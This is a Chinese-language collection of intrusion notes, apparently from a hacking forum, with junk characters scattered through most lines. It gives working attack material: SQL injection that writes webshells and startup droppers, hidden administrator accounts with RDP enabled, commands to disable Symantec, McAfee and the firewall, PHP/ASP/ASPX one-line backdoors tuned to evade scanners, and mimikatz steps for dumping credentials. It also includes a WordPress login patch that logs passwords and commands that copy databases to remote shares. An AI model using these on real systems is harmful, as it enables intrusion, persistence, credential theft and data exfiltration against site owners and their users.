' u/ B- `* d4 n7 @& Xuse test;) h" q7 x& Y0 d" Y' u
create table a (cmd text);# d9 y4 [# C h+ t8 P3 M& J
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
. m2 S& s3 w. D, Finsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );; F9 W0 L6 ]" N2 Y- t' O2 ^: j
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
" c, i( E2 z4 j0 A0 m* }select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";2 M: o! k0 R5 g% e7 n3 d
drop table a;1 C8 \ ]$ J7 |: g p) W
. o+ y3 I2 d7 l4 x; [
英文版本:' }; D1 c: a0 ]' o7 _' O# a: b* |2 e
/ o5 s" _5 Q( B( b' @0 r! Suse test;
6 h- |3 K/ U# Tcreate table a (cmd text);. T8 K0 m1 Z$ _9 g0 {* Y9 ^; |) G
insert into a values ("set wshshell=createobject (""wscript.shell"") " );$ X( R, S8 k4 _' g
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
8 A( n k/ U0 X7 Z' q1 ^insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );% N; D- S0 P6 X9 b4 L2 H
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";! i( p# v j0 m
drop table a;/ Q# y) v- q; v9 v( ~
! n, O* ~% | ]7 M7 u% Q% Fcreate table a (cmd BLOB);
1 \6 B9 Z! Y/ @" Q1 Tinsert into a values (CONVERT(木马的16进制代码,CHAR));
- q& f2 x0 H c* cselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
" P, O |! B; D( Gdrop table a;7 [6 k+ j! p3 y
% Z( V$ w) w1 k: e
记录一下怎么处理变态诺顿
r$ z7 Z1 s+ E+ g& I/ b, f查看诺顿服务的路径! H$ J; V: p; F! [' b( ^
sc qc ccSetMgr- z, A' h7 A# @( |) x8 T+ v( n. ^: [
然后设置权限拒绝访问。做绝一点。。
1 o) M% ]; t9 q' S! M. Q! Pcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system' [: y& N) g, C3 G5 l
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"" o; t& i. A' H1 P5 ?" e3 |
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
7 c$ ^ L. A* ~5 O& q0 _+ Acacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
4 |" Z" p& r7 z: o8 v
6 y3 S# R2 i0 n1 G然后再重启服务器
$ F' S/ B' O! j" b# C. ^& b+ _/ Kiisreset /reboot* x; u. B- [1 a3 t v1 f( r
这样就搞定了。。不过完事后。记得恢复权限。。。。3 ~3 `0 g7 i. ?
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F% U9 e% ?* W& [
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F$ l9 ]; c, U9 z1 d" _% E
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F# o* [1 ]4 }; O" O0 A) @, }8 G
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
/ x) l) ~4 k0 z' x9 vSELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
- @2 l3 U f; ?$ _& ]4 K) B
) p% T0 ]( F) gEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
" E. N1 G. t- `. z. J0 g% B$ I
. U3 t' W: H, m, S+ K& Jpostgresql注射的一些东西- |( F: _4 l& I$ L' U2 ?$ T& V- t, j
如何获得webshell+ H% t3 R! j9 U9 r/ H
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); $ ?$ U9 E) U2 @4 e& Z* I: `
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); 0 }" v8 d# ~0 ?$ f5 r
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;1 v4 d. ^& K; ]0 S2 L
如何读文件! [4 d/ k6 n; s
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
* Y, G, M+ ^" ~http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;3 u8 P, V/ _- i2 C
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
; r$ \' f8 Q9 ]+ E, |
2 r/ k$ ^0 Y* z# G% W& H0 jz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
G6 b4 B. N6 D% }6 ~; ~当然,这些的postgresql的数据库版本必须大于8.X
6 }% a: B/ o4 T- b' b9 X A创建一个system的函数:
2 A8 ~" ], t) x- j- c# ECREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
1 T: h |9 _$ v$ A' u$ p; i9 w' H, L: o Z0 P q
创建一个输出表:. A( i) F9 P" ]6 L
CREATE TABLE stdout(id serial, system_out text)
% t" q5 `4 c% ~* g( H. l
; _# D4 _- a7 F% w. F) `执行shell,输出到输出表内:
' r9 r; _5 T$ U0 ^SELECT system('uname -a > /tmp/test')
C A! ^; _1 |$ P! G, I! l' B
/ g' L6 k. ^/ M$ Tcopy 输出的内容到表里面;
0 M3 C o+ N7 D1 ?1 b' s' UCOPY stdout(system_out) FROM '/tmp/test'
# x9 O* m& ?; ~+ ^/ [* F2 `
. Y2 D4 E- i2 u, z从输出表内读取执行后的回显,判断是否执行成功) }, B* V. K# F% D# i' v8 X( g
5 {/ v9 g/ `/ t! s# b6 e4 C
SELECT system_out FROM stdout
$ I0 Y4 m; t' l1 g' ~8 x5 F1 ~下面是测试例子
7 j! h2 u2 }2 u Q3 S/ i3 W Y( T2 p' @. l: f6 Q
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
4 }8 ?& s- e: B/ j' Y# n& J/ K7 }) ?
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
8 _6 s( L$ q, [+ U" L5 H1 pSTRICT --
6 w7 f" S( a9 T( z6 K+ _
) h& \ T" n4 x/store.php?id=1; SELECT system('uname -a > /tmp/test') --; I! T) t) F1 a3 a
3 C) t5 t( p* v) |4 ^
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --( m9 ~+ x: [! Y0 A0 S2 \
$ \ i; G' f/ N
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--+ z/ t' C1 y% {
net stop sharedaccess stop the default firewall2 V$ S% F5 | }! d4 A/ [
netsh firewall show show/config default firewall
5 o1 ]2 P, e: A9 D6 ]" q8 s ?netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
1 h6 u% c; {/ K [9 nnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
. P( K. o' {( l8 \4 B: U2 a( P修改3389端口方法(修改后不易被扫出)" D, }# |6 E( r: G9 \
修改服务器端的端口设置,注册表有2个地方需要修改
, _9 d6 F' d- {8 k1 M; c. n: C$ c8 X1 o- i
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
/ P0 m9 f& q4 J( N/ n& Z) gPortNumber值,默认是3389,修改成所希望的端口,比如6000
% C) Z9 }# [, u0 p& p
2 T# Y$ e: x5 T0 ~第二个地方:
8 Z# \& X5 S7 |3 G8 m[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] # u8 I/ i% j) J M% r
PortNumber值,默认是3389,修改成所希望的端口,比如6000
6 N# {+ `% w6 a" ^ O' f: F3 |5 g5 U- d/ o1 n9 Y9 k' ~9 I+ D. `
现在这样就可以了。重启系统就可以了6 e' i* E3 k; z! P
5 {1 c/ C6 D+ k& V查看3389远程登录的脚本& N; `% x$ _2 u$ j: t
保存为一个bat文件3 [* m5 \4 R& a, t
date /t >>D:\sec\TSlog\ts.log1 ~2 H9 U( b" I2 @8 | O i
time /t >>D:\sec\TSlog\ts.log
- G5 `, K- B( u5 x, j" @8 q2 wnetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log' l8 Q/ S R0 m! L* ~ T- ~
start Explorer4 Y9 K. k" E z9 j' j& p$ Y2 e
% ~! O, X0 u* h1 xmstsc的参数:
# o3 X& h5 W6 t! k: Q0 W- Q0 M. ~# @! y& b
远程桌面连接( x+ a1 M8 P* U& k5 j6 o- c8 x2 g/ ?
4 P% `, W. y2 {! c' ?0 WMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]2 Z1 {' E$ x$ s, u* ]9 Q }
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?' L: U: u5 h3 j5 J& j7 K* X
, ?3 y, M! i( r& n2 n- a<Connection File> -- 指定连接的 .rdp 文件的名称。8 A2 K& h- ~$ e) ?8 Q
/ C+ }& I# a" \% R$ K2 Z4 `/v:<server[:port]> -- 指定要连接到的终端服务器。
& Q7 N4 N: b. n9 U# e, `6 A
1 ?, ?7 j. s1 k4 z) }/console -- 连接到服务器的控制台会话。
5 ]; F/ ^& H- y3 k$ }5 |2 d/ ~% @: C3 N
/f -- 以全屏模式启动客户端。
H" T5 ]9 u- } F4 `, e5 Q) r+ V
/w:<width> -- 指定远程桌面屏幕的宽度。( {7 c# I8 R& v2 _
# F, {5 N9 a; P0 J/h:<height> -- 指定远程桌面屏幕的高度。
3 B% K4 }0 w/ S
! N9 o6 n4 N* X* [" M& }+ j0 @/edit -- 打开指定的 .rdp 文件来编辑。( {% T6 ?7 @9 [
. Q( e7 Q0 S* Q+ f/migrate -- 将客户端连接管理器创建的旧版) L$ j& `% I. u" \* _
连接文件迁移到新的 .rdp 连接文件。: L. s- E; |7 f
" W- L5 I# j% p! \! L6 l4 j; {! Y
: e. i& v5 z! r; Q6 W# I其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就' B8 M! ]5 {: `* r% W4 i8 @/ u; ?6 T* v0 e( `
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
3 Z \8 h) u, {! ?% M8 N
1 r- e$ l G% z$ Y; ]. F& z# t命令行下开启3389
( x" E8 h# ?. c' O8 T cnet user asp.net aspnet /add' s% Q# a: N4 q% @$ q
net localgroup Administrators asp.net /add
W$ s4 b$ o& g& a. C/ k. tnet localgroup "Remote Desktop Users" asp.net /add( n0 ~7 C% \$ _) v
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
7 {4 l3 K" D" t. d& y; p: Becho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0# J* H' z3 L' ?5 e& g
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 14 {3 e5 H% G9 |) A' [5 m" c1 J
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
, G8 h; z8 m$ L2 usc config rasman start= auto
5 c2 i; O9 X* q; Q8 j( R6 ksc config remoteaccess start= auto' c" ^* _# e* G8 E
net start rasman
8 m4 ? f3 L- { {$ j' Mnet start remoteaccess
~9 c/ I3 h9 MMedia
/ |! r" t: @) O( O+ w/ P. w6 }: p# M<form id="frmUpload" enctype="multipart/form-data"; r) F5 e r$ l! ]) b$ v
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
1 L6 O6 D- \8 T- H$ y" t8 P<input type="file" name="NewFile" size="50"><br>& H; N, P) W- u5 @
<input id="btnUpload" type="submit" value="Upload">' |$ X/ S1 A" g
</form>
- M- x, b& {# |* I6 @0 Q" |$ O# x. e' p' G7 c- _8 P( @: u
control userpasswords2 查看用户的密码
6 _ \9 o8 J9 n/ P1 yaccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径3 k O: f, Z1 ^
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
8 E0 @. V* l6 A7 @
. O( ^6 R8 W' @% a141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:1 c/ {7 t9 R2 R" ^9 C
测试1:
0 ~' r0 v. t" @- m3 u3 Q$ RSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1- }: C0 o0 j; b. \
8 A: ~9 R- f* M) k2 w1 @! W+ G ^: E
测试2:. Z4 \) d* p) Q) [' J a
3 ~- D/ ?+ n8 Z- R' x' V. ]
create table dirs(paths varchar(100),paths1 varchar(100), id int)/ h' Z% E' x, S2 t5 Z7 H3 Z
& L" m' R& Y: a* B5 w( a' Vdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
+ G2 q$ c6 W9 k9 A8 J- ]2 W, \; l0 t1 U$ `8 q1 f* e- U6 G
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1( i! F; r0 Z& D# M- K
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令9 [5 A9 | A* A
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;7 X! x/ J: ]' H7 P4 m9 R6 }& p, m6 e
net stop mcafeeframework
# ]$ G3 q! p; R* ~6 m4 f+ C3 e, Dnet stop mcshield. D2 f7 J w0 f( x9 Z2 ~
net stop mcafeeengineservice
% S4 d0 l4 z2 G1 s; G4 |6 F. Q! ynet stop mctaskmanager
( H$ u: L Y) j# z# C5 Ahttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D6 m8 n6 O* F( ]5 f5 a) l; q
* k! b6 U+ w) n$ C( e. T VNCDump.zip (4.76 KB, 下载次数: 1)
. p. m2 J% j: T$ s密码在线破解http://tools88.com/safe/vnc.php- v8 B! D6 {% \& l
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取, I/ P, r6 }, K$ I+ E4 B; U
; D/ y6 [6 G+ `8 ]* P3 G+ O9 }exec master..xp_cmdshell 'net user'
9 x) H* }' D% b+ l/ imssql执行命令。
) X# Q" e; `& H+ W+ f3 L获取mssql的密码hash查询. c2 @! j; _; R# p0 z
select name,password from master.dbo.sysxlogins
[5 j, _% q: A+ [- b; T, F
* E/ ^& K- s1 p0 i4 ~. k1 [backup log dbName with NO_LOG;: I% p9 h# h2 R" y
backup log dbName with TRUNCATE_ONLY;: h( U7 x2 n: h9 N4 B0 w: L# h, I5 d
DBCC SHRINKDATABASE(dbName);" R, f! x; O) a! d- Q
mssql数据库压缩
1 e' e; s8 Z- f9 B) F* r) q
7 w- @! { s8 n0 `* DRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK! m" P1 c4 Y& X* U5 [
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。% j ]' m" }; z' R% |/ c) B( z
' N# O8 L% }% M/ qbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'; H, @6 n; k: T7 R; d% {- D. ]# t, G& x
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
5 C R1 @8 A0 {* z$ H
8 m9 K! z8 d0 @& |* P) ZDiscuz!nt35渗透要点:: Q) M w" h; _7 z$ ~) H
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default+ m9 ^1 w! m% f' `/ ]
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>6 A. i/ j# a1 k$ d& S0 ?% x) d- J
(3)保存。8 L X) W% O4 }
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass1 n' s( x9 v' @- G7 V' a* G! X
d:\rar.exe a -r d:\1.rar d:\website\
# _/ X4 \8 f. F递归压缩website4 l- T& K& f# e) @& T
注意rar.exe的路径# G2 [7 A4 j& p1 |
1 t1 l! h: A7 S$ N; }/ T7 c<?php
; a* [: M: m9 [; Y8 S. `# w, Q7 N1 d, C6 C3 M( g
$telok = "0${@eval($_POST[xxoo])}";
/ g- j( ^, l+ p& ^
$ U3 }- x8 k/ t, ~7 o+ p5 w$username = "123456";
$ i+ u* E1 }- u2 T7 [, I8 K- ^7 w I: i' C) C
$userpwd = "123456";
k, N' k' a! r1 v+ |" k( X2 \$ D, R t5 u5 o( {7 [/ L
$telhao = "123456";6 {" x4 x9 c- A' b* i9 s
. G" E, J, N7 C' l5 E
$telinfo = "123456";
: `; P# t! C2 p; Z" H
& C6 D4 Y, U" x, L?>$ S* i- g, \5 A' \
php一句话未过滤插入一句话木马
0 _ p. f7 `6 x$ N; ]
8 J. ~0 w. v2 D8 X0 P站库分离脱裤技巧
5 y S \/ B; w8 ^exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'- t+ j0 m# z @: F! q3 Z$ h
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
1 ?7 t4 W! a/ M3 Q7 d! F条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。% P! G9 D, e8 e" X: I5 |
这儿利用的是马儿的专家模式(自己写代码)。
& Z Z" B5 v. Kini_set('display_errors', 1);
. `, U0 {7 S+ `set_time_limit(0);; ~$ e6 m$ Z# t7 E
error_reporting(E_ALL);/ o2 h6 y( L2 n
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());: o/ @7 j( L; w) ?/ b: [
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());) ]* Z8 }. d3 z4 K9 a. |
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());7 a( C/ R1 @1 G; H, G U8 X
$i = 0;0 H* J* g4 ?1 g# n2 O$ K P
$tmp = '';
w0 {2 T& v0 }( Mwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
% m9 ]) E2 r7 I3 \ $i = $i+1;
^4 s8 [3 D& j+ k) ^ $tmp .= implode("::", $row)."\n";
5 p$ s7 J% z# A4 q4 P if(!($i%500)){//500条写入一个文件
& D- {3 y. M/ R/ A1 ?9 H $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
; p9 Y+ @8 A; A5 k file_put_contents($filename,$tmp);) k& j g) J' U6 h5 R, b/ m
$tmp = '';" ]" R$ P s8 n
}( K1 x3 i) K) T
}% C' I$ t$ d5 F: D* L
mysql_free_result($result);
! H. b& x+ u! g: w2 O2 R0 w7 l5 h1 v( W
# E$ r- v, M" W! p3 A6 p
0 ]5 Z- k4 B" ~//down完后delete
2 R3 G/ v, ]/ Q
" c+ x3 V: U D0 O
+ T8 w8 H' l. g1 F' P Xini_set('display_errors', 1);% d5 p7 x! |, D0 e' T
error_reporting(E_ALL);
4 ~+ R: S! k/ w; f: H$i = 0;9 e/ k8 Q& A* v5 w) j
while($i<32) {+ F( k2 v. V; Y% Z% G
$i = $i+1;$ b @7 r$ K7 t/ |) l
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';8 F/ K ?" S& a& }& k4 G
unlink($filename);
; c& J: H; N; }! W9 ^2 p}
+ G2 v, ?$ |0 H j8 shttprint 收集操作系统指纹( T; @* e) I5 D. F+ ]- R# Y
扫描192.168.1.100的所有端口7 L' `" K* \; l- v
nmap –PN –sT –sV –p0-65535 192.168.1.100# z' M0 m6 R2 R
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
) U9 e6 j6 B+ m' A' q/ o2 u3 }4 ]host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输/ H% T5 `! M b u6 T* c
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
+ N# G l c+ c4 e; v' m4 V2 x2 D2 B
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
, w: Q( h# K X3 S1 D" [' X0 O) P" @# q, |# {8 C% |3 ~" h
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)$ r2 [& C% n/ X0 M: |
* `+ q8 v6 I! N: _! j' E
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x& ~5 h" q1 @8 i. P0 r
7 n( p. Z$ }" j
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
0 a3 M Y2 `9 ^4 i/ o. v* S: m/ H: Q
http://net-square.com/msnpawn/index.shtml (要求安装)
, p: n1 k7 s; J0 X/ H
% B( I; `" I$ `9 N# x& O$ w tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)- l- Y- V. y4 \9 c* ?% ~
! ^9 p8 x" W3 i# ] M: ?8 z: p SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
" \3 p6 |- n" R7 n8 g8 ]8 Yset names gb2312
# j6 v- |8 N4 c% q4 b+ Y4 A) j导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
" D7 Y: u: M6 ]7 M' Q( c$ h |2 e; k* a; Z* i$ M7 R
mysql 密码修改
- S* V& \5 p x. Y; c* _: O _* N7 U5 qUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” . `, P: x: G+ C0 T8 J
update user set password=PASSWORD('antian365.com') where user='root';% e7 ]& V0 \% {# C. n
flush privileges;
2 m4 P( @# ^% n5 E: h. c高级的PHP一句话木马后门1 ?( J7 U: Y$ E0 y; A9 v- f( C2 p
Y; ?1 b) X$ a$ G# K; T2 ?
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
& [) U/ D& \5 V% x( }6 @" [, f' h4 j) R: _& A
1、. l. S9 S3 M7 u+ b' W8 g
0 I) @7 S: p" D1 X' c, @' S
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";& d9 r% K7 ~+ z7 v
L" X" r% G L5 i$hh("/[discuz]/e",$_POST['h'],"Access");+ l+ p1 c+ d- Q
1 @3 c: U/ g8 h$ c# o5 R) ]. k//菜刀一句话 c- l/ D3 f6 b* q
8 j+ a6 c! f5 m( c8 ^' Z2、
8 S6 R+ F. R9 _0 ^
% W2 d! H( A3 {- g, U$filename=$_GET['xbid'];6 L& X6 m+ I4 ]3 B
0 m- F' X, L6 ~: binclude ($filename);, d! s6 I6 i! ~2 o8 I1 w* s$ p
' z" c1 {9 X6 `$ g
//危险的include函数,直接编译任何文件为php格式运行' w! n5 ]: a$ |+ w5 d
* d; X! B, N6 o( Q3、2 O! g' q( `; u
# n4 [8 ` A0 [, J2 m. h# c& m& B
$reg="c"."o"."p"."y";
# Z, O) J+ B5 ~ e/ S+ ]! v7 {; \3 ~/ k# |
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
2 [% {) @7 \3 [! _( N, f/ ]# d5 x# e/ a+ [" T1 b5 w+ {0 y* Z
//重命名任何文件) U, K7 o; W( h; Q) n
4 Y1 c. L5 Z) `5 l% _7 k0 y
4、/ }& m z# t" {, l$ u M
5 `* c8 f/ ^# k) A
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";+ ^3 E2 g3 v$ a( v4 w
3 K% D. }) g4 l2 u8 ~$gzid("/[discuz]/e",$_POST['h'],"Access");+ F- M+ I7 X( N7 i9 S
9 c, Z& o/ ^9 k; ]% \( N
//菜刀一句话
+ ^) l# t0 x; _4 C r% Z9 }
( x9 v9 L* j$ T) V2 O1 V5、include ($uid);
% [& t. K ^2 D I3 c M f5 m' W1 P, e$ @" t* Z6 Q$ ]
//危险的include函数,直接编译任何文件为php格式运行,POST ! V8 T$ L( d( \
" R0 Y& t# l: s& h6 G! I! L
* a: a" X' B% R; X//gif插一句话
/ M/ C( t6 q6 H* @& X8 M! L5 {7 i; g* I7 e
6、典型一句话8 r3 j9 a( p& a* X) d8 g
* i2 e; k0 D! M" i程序后门代码0 l7 k- q5 q5 J: P
<?php eval_r($_POST[sb])?>
: o% D3 J j3 P: v程序代码3 i9 ?. F& E1 a3 I) T, i
<?php @eval_r($_POST[sb])?>& e0 z" n$ q* _5 w3 A7 ]
//容错代码4 r% N# C6 R1 {1 m- {' X! d* x
程序代码& }/ u( q/ u% |
<?php assert($_POST[sb]);?>7 j- u) \) q+ j# T
//使用lanker一句话客户端的专家模式执行相关的php语句
, O) }5 @* N8 d b程序代码1 r* g/ a- _4 l; P
<?$_POST['sa']($_POST['sb']);?>( j1 |1 N" z# @% K
程序代码5 K' r9 u+ [* x! O. K; V+ {
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>. b) E& |2 |+ N# N% e8 P
程序代码5 e, G6 }# Q/ z. H
<?php
3 [- O/ ~; p0 E& H; D/ {@preg_replace("/[email]/e",$_POST['h'],"error");( Y0 l+ m m4 q
?>
: e; `- f" @# E3 J//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
3 W8 x% ?3 [4 x% G: Y程序代码6 r" Q% [& x" k& h9 F! H" ^4 b
<O>h=@eval_r($_POST[c]);</O>
) u7 n- W3 z# a6 `. S程序代码, ? r4 |9 p/ J2 @$ k+ f$ d' Q
<script language="php">@eval_r($_POST[sb])</script> X) M9 w0 ~$ R, _7 s
//绕过<?限制的一句话
' \' q' v) m5 j8 E# p/ C# b, {4 h. b4 X6 d
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip, s/ T* l8 G2 x! D( ]
详细用法:$ P9 f/ }* Z( E, a
1、到tools目录。psexec \\127.0.0.1 cmd, c% s2 K4 ~* j& c
2、执行mimikatz
; g8 ~! `! K" P2 \6 @' y3、执行 privilege::debug# u* Q# H* z, h' B5 n8 ~
4、执行 inject::process lsass.exe sekurlsa.dll$ h0 f: k* u* ]6 `% n
5、执行@getLogonPasswords% j2 E8 g( H- W A: c
6、widget就是密码
, C! _4 D* R$ B& C7、exit退出,不要直接关闭否则系统会崩溃。2 W [. |2 j8 y
3 w' u- V" R3 @" Mhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面" i# \/ Y2 s% f& v& g j; E
% o6 ]% q; t6 g2 c& G# O
自动查找系统高危补丁' e) `$ k. p) `6 C0 X
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt2 ~; Z9 E% K: N6 w7 {/ I1 g$ D
4 R" N6 `6 r$ Z5 i
突破安全狗的一句话aspx后门: f" Q( o7 n r- b2 R/ P& M
<%@ Page Language="C#" ValidateRequest="false" %>
$ k/ C6 |7 P3 o" j8 `<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>: |- ~& Q9 Y) A
webshell下记录WordPress登陆密码2 y- d; k% b& E
webshell下记录Wordpress登陆密码方便进一步社工
# C6 r2 n+ N8 X0 \/ |在文件wp-login.php中539行处添加:4 k! k, G0 R5 C
// log password- s$ d1 q* ?* Z1 E
$log_user=$_POST['log'];( s# C. g" f2 d; c% [
$log_pwd=$_POST['pwd'];
" J9 {. v$ H0 e" ?$log_ip=$_SERVER["REMOTE_ADDR"];* R: X! ]3 `% Q+ K' H4 z. a
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;$ @0 M4 t K$ X5 r# ` h
$txt=$txt.”\r\n”;# g+ m* a, L% r1 G
if($log_user&&$log_pwd&&$log_ip){8 k: F& r `' i" a
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);9 q* {4 L* }& O O2 w4 o4 o+ H
}
2 H+ c: O1 w+ X6 |' @当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。) o# M9 C ^ d# Q
就是搜索case ‘login’
6 l& p0 I, h5 i g$ D5 |" p在它下面直接插入即可,记录的密码生成在pwd.txt中,* O& w6 S4 J3 _5 Y( \$ j
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
' o+ x+ R5 u+ `% ?2 T利用II6文件解析漏洞绕过安全狗代码:4 p) s: ?: n5 A' u+ x& A2 [
;antian365.asp;antian365.jpg
2 b2 i" ^ l9 N' H! |' t% |* g% Z4 F& a! D) r; `0 E
各种类型数据库抓HASH破解最高权限密码!: M# e: V) y5 ~% e3 z" D/ R/ j
1.sql server2000, M- d/ m/ w. n7 C9 r9 l
SELECT password from master.dbo.sysxlogins where name='sa'
5 V: \% G* h F0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503417 k8 X! ~3 j, ^" t* X; {4 [, [
